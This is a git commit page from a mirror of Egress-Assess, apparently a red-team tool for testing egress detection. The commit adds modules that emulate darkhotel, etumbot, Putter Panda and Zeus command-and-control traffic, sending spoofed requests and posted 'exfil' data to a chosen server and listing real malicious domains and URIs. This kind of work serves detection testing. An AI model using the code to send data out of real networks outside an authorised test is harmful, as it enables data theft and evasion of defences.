infosecn1nja
/
Egress-Assess
mirror of https://github.com/infosecn1nja/Egress-Assess.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge of our malware modules into Egress-Assess

client_ports 2.1
Chris Truncer 2015-11-16 07:42:26 -07:00
parent e02a727151
commit cbe3fcc0f4
14 changed files with 2076 additions and 376 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

46
Egress-Assess.py
View File

@ -48,8 +48,31 @@ if __name__ == "__main__":
print print
sys.exit() sys.exit()
elif cli_parsed.list_actors:
print "[*] Supported malware/APT groups: \n"
the_conductor.load_actors(cli_parsed)
for name, datatype_module in the_conductor.actor_modules.iteritems():
print "[+] " + datatype_module.cli + " - (" +\
datatype_module.description + ")"
print
sys.exit()
if cli_parsed.server is not None: if cli_parsed.server is not None:
the_conductor.load_server_protocols(cli_parsed) the_conductor.load_server_protocols(cli_parsed)
the_conductor.load_actors(cli_parsed)
# Check if server module is given threat actor vs. normal server
for actor_path, actor_mod in the_conductor.actor_modules.iteritems():
# If actor module is what is used, search for the server requirement
# and load that
if actor_mod.cli == cli_parsed.server.lower():
for full_path, server_actor in the_conductor.server_protocols.iteritems():
if server_actor.protocol.lower() == actor_mod.server_requirement:
server_actor.serve()
for full_path, server in the_conductor.server_protocols.iteritems(): for full_path, server in the_conductor.server_protocols.iteritems():
@ -86,3 +109,26 @@ if __name__ == "__main__":
print "[*] Error: You either didn't provide a valid datatype or client protocol to use." print "[*] Error: You either didn't provide a valid datatype or client protocol to use."
print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options." print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options."
sys.exit() sys.exit()
elif cli_parsed.actor is not None:
# Load different threat actors/malware
the_conductor.load_actors(cli_parsed)
# Identify the actor to emulate
for full_path, actor_variant in the_conductor.actor_modules.iteritems():
if actor_variant.cli == cli_parsed.actor.lower():
# Check if generating data or using data within the actor module
if cli_parsed.datatype is not None:
the_conductor.load_datatypes(cli_parsed)
# Generate the data for the actor to exfil
for name, datatype_module in the_conductor.datatypes.iteritems():
if datatype_module.cli == cli_parsed.datatype.lower():
generated_data = datatype_module.generate_data()
actor_variant.emulate(data_to_exfil=generated_data)
# Instead, use the exfil data within the module
else:
actor_variant.emulate()

1425
Invoke-EgressAssess.ps1 → EgressAssess.ps1
View File

File diff suppressed because it is too large Load Diff

0
commandcontrol/__init__.py Normal file
View File

0
commandcontrol/apt/__init__.py Normal file
View File

89
commandcontrol/apt/darkhotel.py Normal file
View File

@ -0,0 +1,89 @@
'''
This module generates darkhotel traffic.
Resources:
https://securelist.com/blog/research/66779/the-darkhotel-apt/
'''
import random
import sys
import urllib
import urllib2
class Actor:
def __init__(self, cli_object):
self.cli = "darkhotel"
self.description = "darkhotel backdoor"
self.type = "malware"
self.server_requirement = "http"
self.egress_server = cli_object.ip
self.domains = [
'micronaoko.jumpingcrab.com', 'microchsse.strangled.net',
'microbrownys.strangled.net', 'microplants.strangled.net',
'microlilics.crabdance.com']
self.uris = [
'/bin/read_i.php?a1=step2-down-b&a2=KJNSDFkjmdfH&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTMtMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgWFAgKFNlcnZpY2UgUGFjayAzKU5ldCBjYXJkIDogMTkyLjE2OC4wLjIgKDEzMzc3MzMxMTMzNyk=&a4=KS',
'/bin/read_i.php?a1=step2-down-r&a2=KDYEMDYWM&a3=SW5mb1N5c0BVc2VyIE1ZQ09NUFVURVJATXlVc2VyICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctMTY2N1UgQ1BVIEAgMTYwMEdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgNyAoU2VydmljZSBQYWNrIDIpTmV0IGNhcmQgOiAxOTIuMTY4LjI1LjIgKDEzMzc3MzMxMTMzNyk=&a4=TR',
'/bin/read_i.php?a1=step2-down-u&a2=YEMDGEJEIMD&a3=SW5mb1N5c0BVc2VyIFdvcmtzdGF0aW9uQFNvbm9mRmx5bm4gKDA4NTApQyBQIFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy0xNTBVIENQVSBAIDE2MDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDguMSAoU2VydmljZSBQYWNrIDEpTmV0IGNhcmQgOiAxOTIuMTY4LjMzLjIgKDEzMzc3MzMxMTMzNyk=&a4=BD',
'/bin/read_i.php?a1=step2-down-c&a2=MSNETJ&a3=SW5mb1N5c0BVc2VyIFNFUlZFUkRDQEFETUlOICgwODUwKUMgUCBVIDogSW50ZWwoUikgQ29yZShUTSkgaTctOTBVIENQVSBAIDIwMDBHSHpTeXN0ZW0gT1M6IE1pY3Jvc29mdCBXaW5kb3dzIDEwIE5ldCBjYXJkIDogMTkyLjE2OC4xMzMuMiAoMTMzNzczMzExMzM3KQ==&a4=AST',
'/bin/read_i.php?a1=step2-down-k&a2=VSEJKNEF&a3=SW5mb1N5c0BVc2VyIERCQURCQFNZU0RCQSAoMDg1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MCBDUFUgQCAzMjAwR0h6U3lzdGVtIE9TOiBNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwMyBOZXQgY2FyZCA6IDE5Mi4xNjguMTUzLjIgKDEzMzc3MzMxMTMzNyk=&a4=NOD'
'/bin/read_i.php?a1=step2-down-j&a2=ALFDOEJNKF&a3=SW5mb1N5c0BVc2VyIERBZG1pbkBEQ1N5cyAoMDk1MClDUFUgOiBJbnRlbChSKSBDb3JlKFRNKSBpNy05MDAgQ1BVIEAgMzgwMUdIelN5c3RlbSBPUzogTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDggTmV0IGNhcmQgOiAxOTIuMTY4LjE5My4yICgxMzM3NzMzMTEzMzcp&a4=NV']
self.checkin_domains = [
'autolace.twilightparadox.com', 'automachine.servequake.com']
def emulate(self, data_to_exfil=None):
# headers that are used in get requests
darkhotel_headers = {
"User-Agent": " Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
"Connection": "Keep-Alive",
"Cache-Control": "no-cache",
}
selected_checkin_domain = random.choice(self.checkin_domains)
darkhotel_headers['Host'] = selected_checkin_domain
get_request = urllib2.Request(
"http://" + self.egress_server + "/major/images/view.php",
headers=darkhotel_headers)
try:
urllib2.urlopen(get_request)
except urllib2.URLError:
print "[*] Error: Cannot connect to darkhotel data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
get_request2 = urllib2.Request(
"http://" + self.egress_server + "/major/txt/read.php",
headers=darkhotel_headers)
try:
urllib2.urlopen(get_request2)
except urllib2.URLError:
print "[*] Error: Cannot connect to darkhotel data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
# Iterate over get and post request 5 times
for times_requested in xrange(1, 6):
selected_domain = random.choice(self.domains)
darkhotel_headers['Host'] = selected_domain
darkhotel_uri = random.choice(self.uris)
get_req2 = urllib2.Request(
"http://" + self.egress_server + darkhotel_uri, headers=darkhotel_headers)
try:
urllib2.urlopen(get_req2)
except urllib2.URLError:
print "[*] Error: Cannot connect to darkhotel data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
print "URI == " + darkhotel_uri
print "[*] INFO: DarkHotel C2 comms complete!"
return

96
commandcontrol/apt/etumbot.py Normal file
View File

@ -0,0 +1,96 @@
'''
This module generates etumbot traffic.
Resources:
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/etumbot.profile
'''
import random
import sys
import urllib2
class Actor:
def __init__(self, cli_object):
self.cli = "etumbot"
self.description = "etumbot backdoor"
self.type = "malware"
self.server_requirement = "http"
self.egress_server = cli_object.ip
self.domains = [
'200.27.173.58', '200.42.69.140', '92.54.232.42', '133.87.242.63',
'98.188.111.244', 'intro.sunnyschool.com.tw', '143.89.145.156',
'198.209.212.82', '143.89.47.132', '196.1.199.15',
'wwap.publiclol.com', '59.0.249.11', '190.16.246.129',
'211.53.164.152', 'finance.yesplusno.com']
self.encoded_string = [
'dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--',
'Y2F0Y2hldHVtYm90aWZ5b3VjYW4-',
'Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24-',
'bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA--',
'd2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw-',
'U2VtaW5vbGVzd291bGRkZXN0cm95cGVubnN0YXRl',
'dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-',
'bm90cmVkYW1lY2hlYXRzdG93aW4-',
'dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l',
'YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy']
self.post_data = [
{'etumbot_id': 'uid=0(root) gid=0(root) groups=0(root)'},
{'etumbot_whoami': 'root'}, {'etumbot_dir': 'C:\\, C:\\Windows'},
{'etumbot_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
{'etumbot_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'},
{'etumbot_ping': 'google.com time=11.6, 19.1, 12.8, 20'}]
self.uris = [
'/image/' + random.choice(self.encoded_string) + '.jpg',
'/history/' + random.choice(self.encoded_string) + '.asp',
'/manage/asp/item.asp?id=' + random.choice(self.encoded_string) + '&&mux=' + random.choice(self.encoded_string),
'/article/30441/Review.asp?id=' + random.choice(self.encoded_string) + '&&date=' + random.choice(self.encoded_string),
'/tech/s.asp?m=' + random.choice(self.encoded_string)]
def emulate(self, data_to_exfil=None):
# headers that are used in get requests
etumbot_headers = {
"User-Agent": "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Connection": "Keep-Alive",
"Referrer": "http://www.google.com/",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept": "text/html,application/xhtml+xml,application/xml,q=0.9,*/*;q=0.8"
}
selected_domain = random.choice(self.domains)
etumbot_headers['Host'] = selected_domain
get_request = urllib2.Request(
"http://" + self.egress_server + "/home/index.asp?typeid=13",
headers=etumbot_headers)
try:
urllib2.urlopen(get_request)
except urllib2.URLError:
print "[*] Error: Cannot connect to etumbot data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
# Iterate over get and post request 5 times
for times_requested in xrange(1, 6):
selected_domain = random.choice(self.domains)
etumbot_headers['Host'] = selected_domain
etumbot_uri = random.choice(self.uris)
get_req2 = urllib2.Request(
"http://" + self.egress_server + etumbot_uri, headers=etumbot_headers)
try:
urllib2.urlopen(get_req2)
except urllib2.URLError:
print "[*] Error: Cannot connect to etumbot data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
print "URI == " + etumbot_uri
print "[*] INFO: Etumbot C2 comms complete!"
return

108
commandcontrol/apt/putterpanda.py Normal file
View File

@ -0,0 +1,108 @@
'''
This module generates putterpanda traffic.
Resources:
http://blog.crowdstrike.com/hat-tribution-pla-unit-61486/
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/putter.profile
'''
import random
import sys
import urllib
import urllib2
class Actor:
def __init__(self, cli_object):
self.cli = "putterpanda"
self.description = "Putter Panda APT"
self.type = "malware"
self.server_requirement = "http"
self.egress_server = cli_object.ip
self.domains = [
'ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com',
'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org',
't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net',
'jj-desk.com', 'satelliteclub.info', 'space-today.info',
'sst1.info', 'stream-media.info', 'webfilestore.net']
self.post_data = [
{'putterpanda_id': 'uid=0(root) gid=0(root) groups=0(root)'},
{'putterpanda_whoami': 'root'}, {'putterpanda_dir': 'C:\\, C:\\Windows'},
{'putterpanda_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
{'putterpanda_ipconfig': '192.168.1.83 255.255.255.0 192.168.1.1'},
{'putterpanda_ping': 'google.com time=11.6, 19.1, 12.8, 20'}]
self.encoded_hostnames = [
'SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u',
'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=',
'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==',
'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292',
'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==',
'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292']
self.uris = [
'/search5' + str(self.gen_numbers()) + '?h1=' + str(self.gen_numbers(num=2)) + '&h2=' + random.choice('13') + '&h3=' + str(self.gen_numbers(num=6)) + '&h4=' + self.random_letters(),
'/microsoft/errorpost/default/connect.aspx?ID=' + str(self.gen_numbers()),
'/MicrosoftUpdate/ShellEX/KB' + str(self.gen_numbers(num=7)) + '/default.aspx?tmp=' + random.choice(self.encoded_hostnames),
'/microsoft/errorpost/default.aspx?ID=' + str(self.gen_numbers()),
'/MicrosoftUpdate/GetUpdate/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames),
'/MicrosoftUpdate/GetFiles/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames),
'/MicrosoftUpdate/WWRONG/KB' + str(self.gen_numbers(num=7)) + '/default.asp?tmp=' + random.choice(self.encoded_hostnames)]
def emulate(self, data_to_exfil=None):
# headers that are used in get requests
putter_headers = {
"Accept": "*/*",
"Connection": "Keep-Alive",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
}
# Iterate over get and post request 5 times
for times_requested in xrange(1, 6):
selected_domain = random.choice(self.domains)
putter_headers['Host'] = selected_domain
putter_uri = random.choice(self.uris)
# Determining which data is being sent out by agent
if data_to_exfil is None:
posted_data = random.choice(self.post_data)
else:
posted_data = {'putterpanda_data': data_to_exfil}
# UrlEncode and send the data out
posted_data = urllib.urlencode(posted_data)
post_req = urllib2.Request(
"http://" + self.egress_server + putter_uri, posted_data, headers=putter_headers)
try:
urllib2.urlopen(post_req)
except urllib2.URLError:
print "[*] Error: Cannot connect to putter panda data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
print "[*] INFO: PutterPanda C2 comms complete!"
return
def gen_numbers(self, num=5):
if num == 5:
return random.randint(10000, 99999)
elif num == 2:
return random.randint(10, 99)
elif num == 6:
return random.randint(100000, 999999)
elif num == 7:
return random.randint(1000000, 9999999)
else:
print "odd error?"
sys.exit()
return
def random_letters(self, total=24):
random_string = ''.join(
random.choice('ABCDEFGHIJKLMNOP') for x in range(total))
return random_string

0
commandcontrol/malware/__init__.py Normal file
View File

279
commandcontrol/malware/zeus.py Normal file
View File

@ -0,0 +1,279 @@
'''
This module generates Zeus traffic.
Resources:
https://zeustracker.abuse.ch/blocklist.php
https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
'''
import random
import sys
import urllib
import urllib2
class Actor:
def __init__(self, cli_object):
self.cli = "zeus"
self.description = "Zeus Malware"
self.type = "malware"
self.server_requirement = "http"
self.egress_server = cli_object.ip
self.domains = [
'0x.x.gg', '6pjddrtt7.com', 'apexholdngs.com', 'baoshlda.com',
'bestdove.in.ua', 'championbft.com', 'codedtunes.zapto.org',
'cooldomainname.ws', 'danislenefc.info', 'dau43vt5wtrd.tk',
'diosdelared.com.mx', 'emaillifecoaching.com.au', 'emekonline.tk',
'eresimgbo.com', 'escoesco.info', 'fileserver03.com',
'finsolutions.top', 'fronty2073.net', 'genmjob3.ru',
'gjiayimeiya.com', 'gorainbowzone.tk', 'hope-found-now.net',
'hruner.com', 'hui-ain-apparel.tk', 'ice.ip64.net',
'interglobalswiss.info', 'jomo.in.ua', 'juyteche.tk',
'kesikelyaf.com', 'legitvendors.ru', 'lion.web2.0campus.net',
'liveresellerweb.eu', 'mccc-investconsultant.com' 'muazymaur.tk',
'mymytonnymaxltd.org', 'mypic.hopto.org', 'mystartap.com',
'neease.com', 'ns513726.ip-192-99-148.net',
'panel.vargakragard.se', 'polyaire-au.com',
'projects.globaltronics.net', 'regame.su', 'richus.ru',
'server.bovine-mena.com', 'ssl.sinergycosmetics.com',
'sslsam.com', 'sus.nieuwmoer.info', 'tesab.org.uk',
'up.frigo2000.it', 'update.odeen.eu', 'update.rifugiopontese.it',
'urchilaa.com', 'winscoft.com', 'www.nikey.cn',
'www.riverwalktrader.co.za', 'www.witkey.com', 'zabava-bel.ru']
self.post_data = [
{'zeus_id': 'uid=0(root) gid=0(root) groups=0(root)'},
{'zeus_whoami': 'root'}, {'zeus_dir': 'C:\\, C:\\Windows'},
{'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe'},
{'zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1'},
{'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20'}]
self.uris = [
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
'/zeujuus/a/modules/config.bin',
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
'/zejius/2HZG41Zw/bot.exe',
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
'/zejius/5GPR0iy9/bot.exe',
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
'/past/gate.php', '/fan/base/config.jpg',
'/wp-includes/pomo/panel/config.jpg',
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
'/home/plugins/system/tmp/bot.scr',
'/home/plugins/system/tmp/config.bin',
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
'/vs/panel/gate.php', '/brand/server/file.php',
'/brand/server/gate.php',
'/wp-admin/css/colors/sunrise/admin/bot.exe',
'/wp-admin/css/colors/sunrise/admin/config.bin',
'/wp-admin/css/colors/sunrise/admin/secure.php',
'/wp-content/themes/chagim/library/images/plates/bot.exe',
'/wp-content/themes/chagim/library/images/plates/config.bin',
'/wp-content/themes/chagim/library/images/plates/gate.php',
'/images/burr_insurance001001.php', '/images/team/config.jpg',
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
'/capa.exe', '/secure.php', '/ral/30/config.bin',
'/ral/30/secure.php', '/wp-admin/css/config.bin',
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
'/panel/config.jpg', '/panel/gate.php',
'/wp-includes2/SimplePie/Net/page/config.jpg',
'/wp-includes2/SimplePie/Net/page/gate.php',
'/includes/.srv/srv/bot.exe',
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
'/emman/panel/gate.php', '/xampp/img/escu.bin',
'/xampp/img/escu.exe', '/xampp/img/secure.php',
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
'/isai/modules/mod_upgrade/config.bin',
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
'/img/vg.php', '/components/com_file/file.php',
'/components/com_file/gate.php', '/images/panel/config.jpg',
'/images/panel/gate.php', '/wordpress/gate.php',
'/wordpress/gree.jpg', '/media/.tmp/file.php',
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
'/modules/holl.exe', '/templates/admin/install/config.jpg',
'/templates/admin/install/gate.php',
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
'/tmp/install/config.jpg', '/tmp/install/gate.php',
'/frank/panel/config.jpg', '/frank/panel/gate.php',
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
'/js/admin/install/gate.php',
'/wp-content/plugins/wp-db-backup-made/work.php',
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
'/chopinschumann/secure.php', '/images/ital.bin',
'/images/ital.exe', '/images/secure.php',
'/compose/panel/bot.exe', '/compose/panel/config.bin',
'/compose/panel/secure.php', '/fy97/panel/config.bin',
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
'/components/com_joomla/plugin/gate.php',
'/resource/css/config.bin', '/resource/css/secure.php',
'/wp-content/upgrade/PANEL/config.jpg',
'/wp-content/upgrade/PANEL/gate.php',
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
'/Scripts/_notes/build/bot.exe',
'/Scripts/_notes/build/config.bin',
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
'/walex/files/bot.exe', '/walex/files/config.jpg',
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
'/e7/gate.php',
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
'/wp-admin/css/colors/coffee/cat/server/gate.php',
'/site/S/13897652/5112/file.php',
'/site/S/13897652/5112/gate.php',
'/images/js/osomo/panel/config.jpg',
'/images/js/osomo/panel/gate.php',
'/themes/panel/config.jp', '/themes/panel/gate.php',
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
'/wqwcqqw/sasasacw.php', '/images/server/file.php',
'/images/server/gate.php', '/cache/lcitorg/config.bin',
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
'/form/panel/gate.php', '/backup/gate.php',
'/backup/jera.jpg', '/images/file.php',
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
'/images/config.jpg', '/images/gate.php',
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
'/image/Panel/config.jpg', '/folder/config.bin',
'/folder/secure.php', '/plugins/panel/config.jpg',
'/plugins/panel/gate.php',
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
'/js/MOM/config.jpg', '/js/MOM/gate.php',
'/lung/panel/config.jpg', '/wp/config.jpg',
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
'/templates/beez/bot.exe', '/templates/beez/config.bin',
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
'/wp-includes/css/new/gate.php',
'/language/pdf_fonts/server/bot.exe',
'/language/pdf_fonts/server/config.bin',
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
'/percy/panel/config.jpg', '/percy/panel/gate.php',
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
'/.id/gate.php',
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
'/alumno309/images/secure.php',
'/wp-content/plugins/wp-db-backup-made/das.db',
'/ta_images/tools.php', '/plank/panel/config.jpg',
'/includes/database/http/config.jpg',
'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
'/administrator/modules/mod_menu/help/config.jpg',
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
'/forum.php', '/config.php', '/wp-blog/gate.php',
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
'/images/outl.jpg', '/images/smilies/raye.jpg',
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
'/plugins/system/bot.exe', '/plugins/system/config.bin',
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
'/katolog/thumbs/panel/config.jpg',
'/katolog/thumbs/panel/gate.php']
def emulate(self, data_to_exfil=None):
# headers that are used in get requests
zeus_headers = {
"Accept": "*/*",
"Connection": "Close",
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Pragma": "no-cache"
}
# Iterate over get and post request 5 times
for times_requested in xrange(1, 6):
selected_domain = random.choice(self.domains)
zeus_headers['Host'] = selected_domain
first_uri = random.choice(self.uris)
get_request = urllib2.Request(
"http://" + self.egress_server + first_uri,
headers=zeus_headers)
try:
urllib2.urlopen(get_request)
except urllib2.URLError:
print "[*] Error: Cannot connect to zeus data exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
select_post_uri = False
while not select_post_uri:
post_uri = random.choice(self.uris)
if post_uri.endswith('.exe'):
pass
else:
select_post_uri = True
# Determining which data is being sent out by agent
if data_to_exfil is None:
posted_data = random.choice(self.post_data)
else:
posted_data = {'zeus_data': data_to_exfil}
# UrlEncode and send the data out
posted_data = urllib.urlencode(posted_data)
post_req = urllib2.Request(
"http://" + self.egress_server + post_uri, posted_data,
headers=zeus_headers)
try:
urllib2.urlopen(post_req)
except urllib2.URLError:
print "[*] Error: Cannot connect to putter zeus exfil server!"
print "[*] Error: Possible firewall, or proxy prventing this?"
sys.exit(1)
print "[*] INFO: Zeus C2 comms complete!"
return

21
common/helpers.py
View File

@ -33,6 +33,14 @@ def cli_parser():
protocols.add_argument("--ip", metavar="192.168.1.2", default=None, protocols.add_argument("--ip", metavar="192.168.1.2", default=None,
help="IP to extract data to.") help="IP to extract data to.")
actors = parser.add_argument_group('Actor Emulation')
actors.add_argument(
"--actor", default=None, metavar="[zeus]",
help="Emulate [actor] C2 comms to egress server.")
actors.add_argument(
"--list-actors", default=False, action='store_true',
help="List all supported malware/APT group modules")
servers = parser.add_argument_group('Server Protocol Options') servers = parser.add_argument_group('Server Protocol Options')
servers.add_argument( servers.add_argument(
"--server", default=None, metavar='[http]', "--server", default=None, metavar='[http]',
@ -74,19 +82,19 @@ def cli_parser():
print "[*] Error: FTP or SFTP connections require \ print "[*] Error: FTP or SFTP connections require \
a username and password!".replace(' ', '') a username and password!".replace(' ', '')
print "[*] Error: Please re-run and provide the required info!" print "[*] Error: Please re-run and provide the required info!"
sys.exit() sys.exit(1)
if args.client and args.ip is None: if args.client and args.ip is None:
print "[*] Error: You said to act like a client, but provided no ip" print "[*] Error: You said to act like a client, but provided no ip"
print "[*] Error: to connect to. Please re-run with required info!" print "[*] Error: to connect to. Please re-run with required info!"
sys.exit() sys.exit(1)
